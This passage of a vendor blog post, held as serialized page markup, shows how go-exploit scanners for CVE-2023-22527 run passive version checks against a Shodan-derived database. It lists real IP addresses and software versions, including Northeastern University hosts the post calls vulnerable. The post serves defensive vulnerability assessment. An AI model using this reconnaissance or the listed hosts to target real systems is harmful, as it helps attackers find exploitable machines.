75,69678,69680],{"class":1375,"line":4817},[1373,69676,69677],{"class":2206},"129.241.14.197",[1373,69679,17472],{"class":1397},[1373,69681,69634],{"class":2206},[1373,69683,69684,69687,69689],{"class":1375,"line":4825},[1373,69685,69686],{"class":2206},"
158.160.120.182",[1373,69688,17472],{"class":1397},[1373,69690,69634],{"class":2206},[1373,69692,69693,69696,69698],{"class":1375,"line":4835},[1373,69694,69695],{"class":2206},"52.34.139.174",[1373,69697,17472],{"class":1397},[1373,69699,69634],{"class":2206},[1373,69701,69702,69704,69706,69708,69711,69713,69715,69717,69719,69721],{"class":1375,"line":4843},[1373,69703,69585],{"class":2206},[1373,69705,69588],{"class":4640},[1373,69707,49878],{"class":1391},[1373,69709,69710],{"class":1391}," count",[1373,69712,1384],{"class":1383},[1373,69714,35613],{"class":1397},[1373,69716,2230],{"class":1383},[1373,69718,67067],{"class":1391},[1373,69720,69598],{"class":1391},[1373,69722,4912],{"class":1383},[1373,69724,69725],{"class":1375,"line":4849},[1373,69726,69727],{"class":2206},"2313\n",[1373,69729,69730,69732],{"class":1375,"line":4877},[1373,69731,69585],{"class":2206},[1373,69733,6765],{"class":4640},[61,69735,69737],{"id":69736},"step-2-grab-a-go-exploit-scanner","Step 2: Grab a go-exploit Scanner",[18,69739,69740,69741,10515,69744,69749],{},"Now that we’ve converted the Shodan Confluence query into a database, we need a go-exploit scanner. Fortunately, VulnCheck ",[47,69742,22232],{"href":53842,"rel":69743},[51],[47,69745,69748],{"href":69746,"rel":69747},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2023-22527",[51],"three exploits"," for CVE-2023-22527 on GitHub back in March, all of which have asset detection and version scanning built in. 
We can grab any of them and run a scanless version check using the generated database.",[61,69751,69753],{"id":69752},"step-3-run-go-exploit-against-your-target-hosts","Step 3: Run go-exploit against your target hosts",[18,69755,69756,69757,69760],{},"In the following, we use the first entry listed in the database above (52.207.194.59:80) and use ",[886,69758,69759],{},"unshare -n"," to demonstrate that go-exploit doesn’t require network access.",[1354,69762,69764],{"className":31740,"code":69763,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fcve-2023-22527\u002Freverseshell$ sudo unshare -n .\u002Fbuild\u002Fcve-2023-22527_linux-arm64 -c -v -rhost 52.207.194.59 -rport 80 -db ~\u002Fgo-exploit-cache\u002Fconfluence.db\ntime=2024-07-19T15:06:11.519-04:00 level=STATUS msg=\"Starting target\" index=0 host=52.207.194.59 port=80 ssl=false \"ssl auto\"=false\ntime=2024-07-19T15:06:11.519-04:00 level=STATUS msg=\"Validating Confluence target\" host=52.207.194.59 port=80\ntime=2024-07-19T15:06:11.531-04:00 level=SUCCESS msg=\"Target verification succeeded!\" host=52.207.194.59 port=80 verified=true\ntime=2024-07-19T15:06:11.531-04:00 level=STATUS msg=\"Running a version check on the remote target\" host=52.207.194.59 port=80\ntime=2024-07-19T15:06:11.532-04:00 level=VERSION msg=\"The reported version is 7.19.17\" host=52.207.194.59 port=80 version=7.19.17\ntime=2024-07-19T15:06:11.542-04:00 level=STATUS msg=\"The target appears to be a patched version.\" host=52.207.194.59 port=80 vulnerable=no\n",[886,69765,69766,69802,69859,69896,69939,69975,70020],{"__ignoreMap":219},[1373,69767,69768,69771,69773,69776,69779,69782,69784,69786,69788,69791,69793,69796,69799],{"class":1375,"line":1376},[1373,69769,69770],{"class":2206},"albinolobster@mournland:~\u002Fcve-2023-22527\u002Freverseshell$",[1373,69772,17747],{"class":1391},[1373,69774,69775],{"class":1391}," unshare",[1373,69777,69778],{"class":2209}," -n",[1373,69780,69781],{"class":1391}," 
.\u002Fbuild\u002Fcve-2023-22527_linux-arm64",[1373,69783,45587],{"class":2209},[1373,69785,45584],{"class":2209},[1373,69787,38910],{"class":2209},[1373,69789,69790],{"class":5467}," 52.207.194.59",[1373,69792,45568],{"class":2209},[1373,69794,69795],{"class":5467}," 80",[1373,69797,69798],{"class":2209}," -db",[1373,69800,69801],{"class":1391}," ~\u002Fgo-exploit-cache\u002Fconfluence.db\n",[1373,69803,69804,69806,69808,69811,69813,69815,69817,69819,69821,69823,69825,69827,69829,69831,69833,69835,69837,69839,69841,69843,69845,69847,69849,69851,69853,69855,69857],{"class":1375,"line":220},[1373,69805,38930],{"class":4640},[1373,69807,5417],{"class":1397},[1373,69809,69810],{"class":1391},"2024-07-19T15:06:11.519-04:00",[1373,69812,38938],{"class":4640},[1373,69814,5417],{"class":1397},[1373,69816,38943],{"class":1391},[1373,69818,38946],{"class":4640},[1373,69820,5417],{"class":1397},[1373,69822,183],{"class":1387},[1373,69824,38979],{"class":1391},[1373,69826,183],{"class":1387},[1373,69828,38984],{"class":4640},[1373,69830,5417],{"class":1397},[1373,69832,445],{"class":1391},[1373,69834,38991],{"class":4640},[1373,69836,5417],{"class":1397},[1373,69838,69610],{"class":1391},[1373,69840,38999],{"class":4640},[1373,69842,5417],{"class":1397},[1373,69844,39004],{"class":1391},[1373,69846,39007],{"class":4640},[1373,69848,5417],{"class":1397},[1373,69850,5971],{"class":1391},[1373,69852,4883],{"class":1387},[1373,69854,39016],{"class":1391},[1373,69856,183],{"class":1387},[1373,69858,39021],{"class":1391},[1373,69860,69861,69863,69865,69867,69869,69871,69873,69875,69877,69879,69882,69884,69886,69888,69890,69892,69894],{"class":1375,"line":1266},[1373,69862,38930],{"class":4640},[1373,69864,5417],{"class":1397},[1373,69866,69810],{"class":1391},[1373,69868,38938],{"class":4640},[1373,69870,5417],{"class":1397},[1373,69872,38943],{"class":1391},[1373,69874,38946],{"class":4640},[1373,69876,5417],{"class":1397},[1373,69878,183],{"class":1387},[1373,69880,69881],{"class"
:1391},"Validating Confluence target",[1373,69883,183],{"class":1387},[1373,69885,38991],{"class":4640},[1373,69887,5417],{"class":1397},[1373,69889,69610],{"class":1391},[1373,69891,38999],{"class":4640},[1373,69893,5417],{"class":1397},[1373,69895,69615],{"class":1391},[1373,69897,69898,69900,69902,69905,69907,69909,69911,69913,69915,69917,69919,69921,69923,69925,69927,69929,69931,69933,69935,69937],{"class":1375,"line":1852},[1373,69899,38930],{"class":4640},[1373,69901,5417],{"class":1397},[1373,69903,69904],{"class":1391},"2024-07-19T15:06:11.531-04:00",[1373,69906,38938],{"class":4640},[1373,69908,5417],{"class":1397},[1373,69910,39062],{"class":1391},[1373,69912,38946],{"class":4640},[1373,69914,5417],{"class":1397},[1373,69916,183],{"class":1387},[1373,69918,45779],{"class":1391},[1373,69920,183],{"class":1387},[1373,69922,38991],{"class":4640},[1373,69924,5417],{"class":1397},[1373,69926,69610],{"class":1391},[1373,69928,38999],{"class":4640},[1373,69930,5417],{"class":1397},[1373,69932,39004],{"class":1391},[1373,69934,45796],{"class":4640},[1373,69936,5417],{"class":1397},[1373,69938,45801],{"class":1391},[1373,69940,69941,69943,69945,69947,69949,69951,69953,69955,69957,69959,69961,69963,69965,69967,69969,69971,69973],{"class":1375,"line":4692},[1373,69942,38930],{"class":4640},[1373,69944,5417],{"class":1397},[1373,69946,69904],{"class":1391},[1373,69948,38938],{"class":4640},[1373,69950,5417],{"class":1397},[1373,69952,38943],{"class":1391},[1373,69954,38946],{"class":4640},[1373,69956,5417],{"class":1397},[1373,69958,183],{"class":1387},[1373,69960,45824],{"class":1391},[1373,69962,183],{"class":1387},[1373,69964,38991],{"class":4640},[1373,69966,5417],{"class":1397},[1373,69968,69610],{"class":1391},[1373,69970,38999],{"class":4640},[1373,69972,5417],{"class":1397},[1373,69974,69615],{"class":1391},[1373,69976,69977,69979,69981,69984,69986,69988,69990,69992,69994,69996,69999,70001,70003,70005,70007,70009,70011,70013,70015,70017],{"class":1375,"line":4
724},[1373,69978,38930],{"class":4640},[1373,69980,5417],{"class":1397},[1373,69982,69983],{"class":1391},"2024-07-19T15:06:11.532-04:00",[1373,69985,38938],{"class":4640},[1373,69987,5417],{"class":1397},[1373,69989,45854],{"class":1391},[1373,69991,38946],{"class":4640},[1373,69993,5417],{"class":1397},[1373,69995,183],{"class":1387},[1373,69997,69998],{"class":1391},"The reported version is 7.19.17",[1373,70000,183],{"class":1387},[1373,70002,38991],{"class":4640},[1373,70004,5417],{"class":1397},[1373,70006,69610],{"class":1391},[1373,70008,38999],{"class":4640},[1373,70010,5417],{"class":1397},[1373,70012,39004],{"class":1391},[1373,70014,45880],{"class":4640},[1373,70016,5417],{"class":1397},[1373,70018,70019],{"class":1391},"7.19.17\n",[1373,70021,70022,70024,70026,70029,70031,70033,70035,70037,70039,70041,70044,70046,70048,70050,70052,70054,70056,70058,70060,70062],{"class":1375,"line":4756},[1373,70023,38930],{"class":4640},[1373,70025,5417],{"class":1397},[1373,70027,70028],{"class":1391},"2024-07-19T15:06:11.542-04:00",[1373,70030,38938],{"class":4640},[1373,70032,5417],{"class":1397},[1373,70034,38943],{"class":1391},[1373,70036,38946],{"class":4640},[1373,70038,5417],{"class":1397},[1373,70040,183],{"class":1387},[1373,70042,70043],{"class":1391},"The target appears to be a patched version.",[1373,70045,183],{"class":1387},[1373,70047,38991],{"class":4640},[1373,70049,5417],{"class":1397},[1373,70051,69610],{"class":1391},[1373,70053,38999],{"class":4640},[1373,70055,5417],{"class":1397},[1373,70057,39004],{"class":1391},[1373,70059,45925],{"class":4640},[1373,70061,5417],{"class":1397},[1373,70063,70064],{"class":1391},"no\n",[18,70066,70067,70068,69531],{},"Above you can see the scanner validated the target as Atlassian Confluence, extracted a version number (7.19.17), and determined the host is using an unaffected version. All that without ever connecting to the host! 
The scanner also updated the ",[886,70069,70070],{},"verified",[1354,70072,70074],{"className":31740,"code":70073,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fgo-exploit-cache$ sqlite3 confluence.db\nSQLite version 3.31.1 2020-01-27 19:55:54\nEnter \".help\" for usage hints.\nsqlite> select * from verified;\n1|1721417205|Confluence|1|7.19.17|52.207.194.59|80\nsqlite>\n",[886,70075,70076,70084,70096,70112,70128,70159],{"__ignoreMap":219},[1373,70077,70078,70080,70082],{"class":1375,"line":1376},[1373,70079,69433],{"class":2206},[1373,70081,69543],{"class":1391},[1373,70083,69454],{"class":1391},[1373,70085,70086,70088,70090,70092,70094],{"class":1375,"line":220},[1373,70087,69550],{"class":2206},[1373,70089,45880],{"class":1391},[1373,70091,69555],{"class":5467},[1373,70093,69558],{"class":1391},[1373,70095,69561],{"class":1391},[1373,70097,70098,70100,70102,70104,70106,70108,70110],{"class":1375,"line":1266},[1373,70099,55798],{"class":2206},[1373,70101,4883],{"class":1387},[1373,70103,69570],{"class":1391},[1373,70105,183],{"class":1387},[1373,70107,55807],{"class":1391},[1373,70109,69577],{"class":1391},[1373,70111,69580],{"class":1391},[1373,70113,70114,70116,70118,70120,70122,70124,70126],{"class":1375,"line":1852},[1373,70115,69585],{"class":2206},[1373,70117,69588],{"class":4640},[1373,70119,49878],{"class":1391},[1373,70121,19113],{"class":6761},[1373,70123,67067],{"class":1391},[1373,70125,45796],{"class":1391},[1373,70127,4912],{"class":1383},[1373,70129,70130,70132,70134,70137,70139,70142,70144,70146,70148,70151,70153,70155,70157],{"class":1375,"line":4692},[1373,70131,467],{"class":2206},[1373,70133,17472],{"class":1397},[1373,70135,70136],{"class":2206},"1721417205",[1373,70138,17472],{"class":1397},[1373,70140,70141],{"class":2206},"Confluence",[1373,70143,17472],{"class":1397},[1373,70145,467],{"class":2206},[1373,70147,17472],{"class":1397},[1373,70149,70150],{"class":2206},"7.19.17",[1373,70152,17472],{"class":1397},[1373,7
0154,69610],{"class":2206},[1373,70156,17472],{"class":1397},[1373,70158,69615],{"class":2206},[1373,70160,70161,70163],{"class":1375,"line":4724},[1373,70162,69585],{"class":2206},[1373,70164,6765],{"class":4640},[61,70166,70168],{"id":70167},"go-scanless-across-multiple-hosts","Go Scanless Across Multiple Hosts",[18,70170,70171,70172,70174,70175,70178,70179,70181],{},"But that’s just one target out of a couple thousand entries in the database. To scan all of the database, you can just loop over all rows in the ",[886,70173,69530],{}," table. VulnCheck has an inhouse tool called ",[886,70176,70177],{},"db-scanner"," that does this. Below we use ",[886,70180,38930],{}," to demonstrate how quickly a scanless version scan can analyze all the hosts.",[1354,70183,70185],{"className":31740,"code":70184,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ftools\u002Fdb-scanner$ time sudo .\u002Fbuild\u002Fdb-scanner -db ~\u002Fgo-exploit-cache\u002Fconfluence.db -scanners ~\u002Fcve-2023-22527\u002Freverseshell\u002Fbuild\u002F -logfile conflue\nnce.log\n\nreal 0m8.335s\nuser 0m3.154s\nsys  0m3.123s\n",[886,70186,70187,70217,70222,70226,70234,70241],{"__ignoreMap":219},[1373,70188,70189,70192,70195,70197,70200,70202,70205,70208,70211,70214],{"class":1375,"line":1376},[1373,70190,70191],{"class":2206},"albinolobster@mournland:~\u002Finitial-access\u002Ftools\u002Fdb-scanner$",[1373,70193,70194],{"class":1391}," time",[1373,70196,17747],{"class":1391},[1373,70198,70199],{"class":1391}," .\u002Fbuild\u002Fdb-scanner",[1373,70201,69798],{"class":2209},[1373,70203,70204],{"class":1391}," ~\u002Fgo-exploit-cache\u002Fconfluence.db",[1373,70206,70207],{"class":2209}," -scanners",[1373,70209,70210],{"class":1391}," ~\u002Fcve-2023-22527\u002Freverseshell\u002Fbuild\u002F",[1373,70212,70213],{"class":2209}," -logfile",[1373,70215,70216],{"class":1391}," 
conflue\n",[1373,70218,70219],{"class":1375,"line":220},[1373,70220,70221],{"class":2206},"nce.log\n",[1373,70223,70224],{"class":1375,"line":1266},[1373,70225,6520],{"emptyLinePlaceholder":237},[1373,70227,70228,70231],{"class":1375,"line":1852},[1373,70229,70230],{"class":2206},"real",[1373,70232,70233],{"class":1391}," 0m8.335s\n",[1373,70235,70236,70238],{"class":1375,"line":4692},[1373,70237,39933],{"class":2206},[1373,70239,70240],{"class":1391}," 0m3.154s\n",[1373,70242,70243,70246],{"class":1375,"line":4724},[1373,70244,70245],{"class":2206},"sys",[1373,70247,70248],{"class":1391},"  0m3.123s\n",[18,70250,70251],{},"After 8 seconds, we have results for all entries in the database \u002F Shodan query. We can quickly grep the log file for results.",[1354,70253,70255],{"className":31740,"code":70254,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ftools\u002Fdb-scanner$ cat confluence.log | grep \"vulnerable=yes\" | wc -l\n56\nalbinolobster@mournland:~\u002Finitial-access\u002Ftools\u002Fdb-scanner$ cat confluence.log | grep \"vulnerable=no\" | wc -l\n2114\n",[886,70256,70257,70287,70292,70317],{"__ignoreMap":219},[1373,70258,70259,70261,70264,70267,70269,70272,70274,70277,70279,70281,70284],{"class":1375,"line":1376},[1373,70260,70191],{"class":2206},[1373,70262,70263],{"class":1391}," cat",[1373,70265,70266],{"class":1391}," confluence.log",[1373,70268,2233],{"class":1397},[1373,70270,70271],{"class":2206}," grep",[1373,70273,4883],{"class":1387},[1373,70275,70276],{"class":1391},"vulnerable=yes",[1373,70278,183],{"class":1387},[1373,70280,2233],{"class":1397},[1373,70282,70283],{"class":2206}," wc",[1373,70285,70286],{"class":2209}," 
-l\n",[1373,70288,70289],{"class":1375,"line":220},[1373,70290,70291],{"class":2206},"56\n",[1373,70293,70294,70296,70298,70300,70302,70304,70306,70309,70311,70313,70315],{"class":1375,"line":1266},[1373,70295,70191],{"class":2206},[1373,70297,70263],{"class":1391},[1373,70299,70266],{"class":1391},[1373,70301,2233],{"class":1397},[1373,70303,70271],{"class":2206},[1373,70305,4883],{"class":1387},[1373,70307,70308],{"class":1391},"vulnerable=no",[1373,70310,183],{"class":1387},[1373,70312,2233],{"class":1397},[1373,70314,70283],{"class":2206},[1373,70316,70286],{"class":2209},[1373,70318,70319],{"class":1375,"line":1852},[1373,70320,70321],{"class":2206},"2114\n",[18,70323,70324],{},"And, of course, the database also stores all the details.",[1354,70326,70328],{"className":31740,"code":70327,"language":2186,"meta":219,"style":219},"sqlite> select * from verified limit 10;\n1|1721417427|Confluence|1|7.19.17|52.200.210.54|80\n2|1721417427|Confluence|1|7.19.16|135.181.36.116|443\n3|1721417427|Confluence|1|7.19.17|52.207.194.59|80\n4|1721417427|Confluence|1|8.5.3|122.152.230.161|8090\n5|1721417427|Confluence|1|8.9.1|31.148.148.9|443\n6|1721417427|Confluence|1|8.9.1|65.203.128.117|8443\n7|1721417427|Confluence|1|7.19.18|85.184.249.239|443\n8|1721417427|Confluence|1|8.9.3|129.241.14.197|443\n9|1721417427|Confluence|1|8.5.5|158.160.120.182|443\n10|1721417427|Confluence|1|7.19.19|52.34.139.174|443\n",[886,70329,70330,70350,70379,70408,70436,70465,70494,70522,70551,70580,70609],{"__ignoreMap":219},[1373,70331,70332,70334,70336,70338,70340,70342,70344,70346,70348],{"class":1375,"line":1376},[1373,70333,69585],{"class":2206},[1373,70335,69588],{"class":4640},[1373,70337,49878],{"class":1391},[1373,70339,19113],{"class":6761},[1373,70341,67067],{"class":1391},[1373,70343,45796],{"class":1391},[1373,70345,69601],{"class":1391},[1373,70347,39673],{"class":5467},[1373,70349,4912],{"class":1383},[1373,70351,70352,70354,70356,70359,70361,70363,70365,70367,70369,70371,70373,70375,703
77],{"class":1375,"line":220},[1373,70353,467],{"class":2206},[1373,70355,17472],{"class":1397},[1373,70357,70358],{"class":2206},"1721417427",[1373,70360,17472],{"class":1397},[1373,70362,70141],{"class":2206},[1373,70364,17472],{"class":1397},[1373,70366,467],{"class":2206},[1373,70368,17472],{"class":1397},[1373,70370,70150],{"class":2206},[1373,70372,17472],{"class":1397},[1373,70374,69620],{"class":2206},[1373,70376,17472],{"class":1397},[1373,70378,69615],{"class":2206},[1373,70380,70381,70383,70385,70387,70389,70391,70393,70395,70397,70400,70402,70404,70406],{"class":1375,"line":1266},[1373,70382,353],{"class":2206},[1373,70384,17472],{"class":1397},[1373,70386,70358],{"class":2206},[1373,70388,17472],{"class":1397},[1373,70390,70141],{"class":2206},[1373,70392,17472],{"class":1397},[1373,70394,467],{"class":2206},[1373,70396,17472],{"class":1397},[1373,70398,70399],{"class":2206},"7.19.16",[1373,70401,17472],{"class":1397},[1373,70403,69629],{"class":2206},[1373,70405,17472],{"class":1397},[1373,70407,69634],{"class":2206},[1373,70409,70410,70412,70414,70416,70418,70420,70422,70424,70426,70428,70430,70432,70434],{"class":1375,"line":1852},[1373,70411,491],{"class":2206},[1373,70413,17472],{"class":1397},[1373,70415,70358],{"class":2206},[1373,70417,17472],{"class":1397},[1373,70419,70141],{"class":2206},[1373,70421,17472],{"class":1397},[1373,70423,467],{"class":2206},[1373,70425,17472],{"class":1397},[1373,70427,70150],{"class":2206},[1373,70429,17472],{"class":1397},[1373,70431,69610],{"class":2206},[1373,70433,17472],{"class":1397},[1373,70435,69615],{"class":2206},[1373,70437,70438,70440,70442,70444,70446,70448,70450,70452,70454,70457,70459,70461,70463],{"class":1375,"line":4692},[1373,70439,380],{"class":2206},[1373,70441,17472],{"class":1397},[1373,70443,70358],{"class":2206},[1373,70445,17472],{"class":1397},[1373,70447,70141],{"class":2206},[1373,70449,17472],{"class":1397},[1373,70451,467],{"class":2206},[1373,70453,17472],{"class":1397},[1373,70455
,70456],{"class":2206},"8.5.3",[1373,70458,17472],{"class":1397},[1373,70460,69639],{"class":2206},[1373,70462,17472],{"class":1397},[1373,70464,69644],{"class":2206},[1373,70466,70467,70469,70471,70473,70475,70477,70479,70481,70483,70486,70488,70490,70492],{"class":1375,"line":4724},[1373,70468,401],{"class":2206},[1373,70470,17472],{"class":1397},[1373,70472,70358],{"class":2206},[1373,70474,17472],{"class":1397},[1373,70476,70141],{"class":2206},[1373,70478,17472],{"class":1397},[1373,70480,467],{"class":2206},[1373,70482,17472],{"class":1397},[1373,70484,70485],{"class":2206},"8.9.1",[1373,70487,17472],{"class":1397},[1373,70489,69649],{"class":2206},[1373,70491,17472],{"class":1397},[1373,70493,69634],{"class":2206},[1373,70495,70496,70498,70500,70502,70504,70506,70508,70510,70512,70514,70516,70518,70520],{"class":1375,"line":4756},[1373,70497,356],{"class":2206},[1373,70499,17472],{"class":1397},[1373,70501,70358],{"class":2206},[1373,70503,17472],{"class":1397},[1373,70505,70141],{"class":2206},[1373,70507,17472],{"class":1397},[1373,70509,467],{"class":2206},[1373,70511,17472],{"class":1397},[1373,70513,70485],{"class":2206},[1373,70515,17472],{"class":1397},[1373,70517,69658],{"class":2206},[1373,70519,17472],{"class":1397},[1373,70521,69663],{"class":2206},[1373,70523,70524,70526,70528,70530,70532,70534,70536,70538,70540,70543,70545,70547,70549],{"class":1375,"line":4768},[1373,70525,423],{"class":2206},[1373,70527,17472],{"class":1397},[1373,70529,70358],{"class":2206},[1373,70531,17472],{"class":1397},[1373,70533,70141],{"class":2206},[1373,70535,17472],{"class":1397},[1373,70537,467],{"class":2206},[1373,70539,17472],{"class":1397},[1373,70541,70542],{"class":2206},"7.19.18",[1373,70544,17472],{"class":1397},[1373,70546,69668],{"class":2206},[1373,70548,17472],{"class":1397},[1373,70550,69634],{"class":2206},[1373,70552,70553,70555,70557,70559,70561,70563,70565,70567,70569,70572,70574,70576,70578],{"class":1375,"line":4792},[1373,70554,37681],{"class":2
206},[1373,70556,17472],{"class":1397},[1373,70558,70358],{"class":2206},[1373,70560,17472],{"class":1397},[1373,70562,70141],{"class":2206},[1373,70564,17472],{"class":1397},[1373,70566,467],{"class":2206},[1373,70568,17472],{"class":1397},[1373,70570,70571],{"class":2206},"8.9.3",[1373,70573,17472],{"class":1397},[1373,70575,69677],{"class":2206},[1373,70577,17472],{"class":1397},[1373,70579,69634],{"class":2206},[1373,70581,70582,70584,70586,70588,70590,70592,70594,70596,70598,70601,70603,70605,70607],{"class":1375,"line":4798},[1373,70583,723],{"class":2206},[1373,70585,17472],{"class":1397},[1373,70587,70358],{"class":2206},[1373,70589,17472],{"class":1397},[1373,70591,70141],{"class":2206},[1373,70593,17472],{"class":1397},[1373,70595,467],{"class":2206},[1373,70597,17472],{"class":1397},[1373,70599,70600],{"class":2206},"8.5.5",[1373,70602,17472],{"class":1397},[1373,70604,69686],{"class":2206},[1373,70606,17472],{"class":1397},[1373,70608,69634],{"class":2206},[1373,70610,70611,70613,70615,70617,70619,70621,70623,70625,70627,70630,70632,70634,70636],{"class":1375,"line":4806},[1373,70612,24698],{"class":2206},[1373,70614,17472],{"class":1397},[1373,70616,70358],{"class":2206},[1373,70618,17472],{"class":1397},[1373,70620,70141],{"class":2206},[1373,70622,17472],{"class":1397},[1373,70624,467],{"class":2206},[1373,70626,17472],{"class":1397},[1373,70628,70629],{"class":2206},"7.19.19",[1373,70631,17472],{"class":1397},[1373,70633,69695],{"class":2206},[1373,70635,17472],{"class":1397},[1373,70637,69634],{"class":2206},[18,70639,70640],{},"So when a new emergent Confluence vulnerability comes out (like it does every quarter), we will be able to say who \u002F how many are vulnerable within seconds. Very useful!",[61,70642,70644],{"id":70643},"a-real-world-example-of-going-scanless-w-go-exploit","A Real World Example of Going Scanless w\u002F go-exploit",[18,70646,70647],{},"We don’t have to limit ourselves to just one CVE or product though. 
Consider the following query that covers Northeastern University.",[18,70649,70650,70654],{},[68,70651],{":width":10862,"alt":70652,"src":70653},"Northeastern on Shodan","\u002Fblog\u002Fvulncheck-goes-scanless\u002Fshodan-northeastern.png",[68,70655],{":width":10862,"alt":70652,"src":69391},[18,70657,70658,70659,70662],{},"Northeastern has thousands of hosts\u002Fassets on their networks, but it's difficult to say what exactly they are from this view. By converting this query into a go-exploit cache database and pushing them through the scanners VulnCheck from our ",[47,70660,1245],{"href":45535,"rel":70661},[51]," offering, we are able to passively identify hundreds of assets, their versions, and what they are vulnerable to (including at least one unauthenticated remote code execution issue). Here is a small sample from the resulting verified table:",[1354,70664,70666],{"className":31740,"code":70665,"language":2186,"meta":219,"style":219},"sqlite> select * from verified where installed = 1 order by id desc limit 10;\n264875|1721415612|XWiki|1|13.10.8|155.33.23.90|443\n230005|1721413745|ASUS|1||129.10.132.218|8443\n223128|1721413373|Tinyproxy|1|1.8.2|155.33.213.146|8080\n223057|1721413370|Tinyproxy|1|1.8.2|129.10.14.218|8080\n221645|1721413311|Tinyproxy|1|1.8.2|129.10.73.222|8080\n221337|1721413298|ownCloud|1||129.10.115.142|443\n153259|1721410531|PaperCut NG\u002FMF|1|66961|155.33.36.94|443\n109011|1721409204|Confluence|1|8.5.12|129.10.117.205|443\n66874|1721408317|Grafana|1||129.10.134.74|3000\n64903|1721408289|Apache HTTP 
Server|1|2.4.59|129.10.111.148|80\n",[886,70667,70668,70709,70741,70769,70803,70834,70865,70893,70929,70961,70990],{"__ignoreMap":219},[1373,70669,70670,70672,70674,70676,70678,70680,70682,70685,70688,70690,70692,70695,70698,70700,70703,70705,70707],{"class":1375,"line":1376},[1373,70671,69585],{"class":2206},[1373,70673,69588],{"class":4640},[1373,70675,49878],{"class":1391},[1373,70677,19113],{"class":6761},[1373,70679,67067],{"class":1391},[1373,70681,45796],{"class":1391},[1373,70683,70684],{"class":1391}," where",[1373,70686,70687],{"class":1391}," installed",[1373,70689,8575],{"class":1391},[1373,70691,5468],{"class":5467},[1373,70693,70694],{"class":1391}," order",[1373,70696,70697],{"class":1391}," by",[1373,70699,7911],{"class":1391},[1373,70701,70702],{"class":1391}," desc",[1373,70704,69601],{"class":1391},[1373,70706,39673],{"class":5467},[1373,70708,4912],{"class":1383},[1373,70710,70711,70714,70716,70719,70721,70723,70725,70727,70729,70732,70734,70737,70739],{"class":1375,"line":220},[1373,70712,70713],{"class":2206},"264875",[1373,70715,17472],{"class":1397},[1373,70717,70718],{"class":2206},"1721415612",[1373,70720,17472],{"class":1397},[1373,70722,31635],{"class":2206},[1373,70724,17472],{"class":1397},[1373,70726,467],{"class":2206},[1373,70728,17472],{"class":1397},[1373,70730,70731],{"class":2206},"13.10.8",[1373,70733,17472],{"class":1397},[1373,70735,70736],{"class":2206},"155.33.23.90",[1373,70738,17472],{"class":1397},[1373,70740,69634],{"class":2206},[1373,70742,70743,70746,70748,70751,70753,70756,70758,70760,70762,70765,70767],{"class":1375,"line":1266},[1373,70744,70745],{"class":2206},"230005",[1373,70747,17472],{"class":1397},[1373,70749,70750],{"class":2206},"1721413745",[1373,70752,17472],{"class":1397},[1373,70754,70755],{"class":2206},"ASUS",[1373,70757,17472],{"class":1397},[1373,70759,467],{"class":2206},[1373,70761,55462],{"class":1397},[1373,70763,70764],{"class":2206},"129.10.132.218",[1373,70766,17472],{"class":1397},[1373,7076
8,69663],{"class":2206},[1373,70770,70771,70774,70776,70779,70781,70784,70786,70788,70790,70793,70795,70798,70800],{"class":1375,"line":1852},[1373,70772,70773],{"class":2206},"223128",[1373,70775,17472],{"class":1397},[1373,70777,70778],{"class":2206},"1721413373",[1373,70780,17472],{"class":1397},[1373,70782,70783],{"class":2206},"Tinyproxy",[1373,70785,17472],{"class":1397},[1373,70787,467],{"class":2206},[1373,70789,17472],{"class":1397},[1373,70791,70792],{"class":2206},"1.8.2",[1373,70794,17472],{"class":1397},[1373,70796,70797],{"class":2206},"155.33.213.146",[1373,70799,17472],{"class":1397},[1373,70801,70802],{"class":2206},"8080\n",[1373,70804,70805,70808,70810,70813,70815,70817,70819,70821,70823,70825,70827,70830,70832],{"class":1375,"line":4692},[1373,70806,70807],{"class":2206},"223057",[1373,70809,17472],{"class":1397},[1373,70811,70812],{"class":2206},"1721413370",[1373,70814,17472],{"class":1397},[1373,70816,70783],{"class":2206},[1373,70818,17472],{"class":1397},[1373,70820,467],{"class":2206},[1373,70822,17472],{"class":1397},[1373,70824,70792],{"class":2206},[1373,70826,17472],{"class":1397},[1373,70828,70829],{"class":2206},"129.10.14.218",[1373,70831,17472],{"class":1397},[1373,70833,70802],{"class":2206},[1373,70835,70836,70839,70841,70844,70846,70848,70850,70852,70854,70856,70858,70861,70863],{"class":1375,"line":4724},[1373,70837,70838],{"class":2206},"221645",[1373,70840,17472],{"class":1397},[1373,70842,70843],{"class":2206},"1721413311",[1373,70845,17472],{"class":1397},[1373,70847,70783],{"class":2206},[1373,70849,17472],{"class":1397},[1373,70851,467],{"class":2206},[1373,70853,17472],{"class":1397},[1373,70855,70792],{"class":2206},[1373,70857,17472],{"class":1397},[1373,70859,70860],{"class":2206},"129.10.73.222",[1373,70862,17472],{"class":1397},[1373,70864,70802],{"class":2206},[1373,70866,70867,70870,70872,70875,70877,70880,70882,70884,70886,70889,70891],{"class":1375,"line":4756},[1373,70868,70869],{"class":2206},"221337",[1373,708
71,17472],{"class":1397},[1373,70873,70874],{"class":2206},"1721413298",[1373,70876,17472],{"class":1397},[1373,70878,70879],{"class":2206},"ownCloud",[1373,70881,17472],{"class":1397},[1373,70883,467],{"class":2206},[1373,70885,55462],{"class":1397},[1373,70887,70888],{"class":2206},"129.10.115.142",[1373,70890,17472],{"class":1397},[1373,70892,69634],{"class":2206},[1373,70894,70895,70898,70900,70903,70905,70908,70911,70913,70915,70917,70920,70922,70925,70927],{"class":1375,"line":4768},[1373,70896,70897],{"class":2206},"153259",[1373,70899,17472],{"class":1397},[1373,70901,70902],{"class":2206},"1721410531",[1373,70904,17472],{"class":1397},[1373,70906,70907],{"class":2206},"PaperCut",[1373,70909,70910],{"class":1391}," 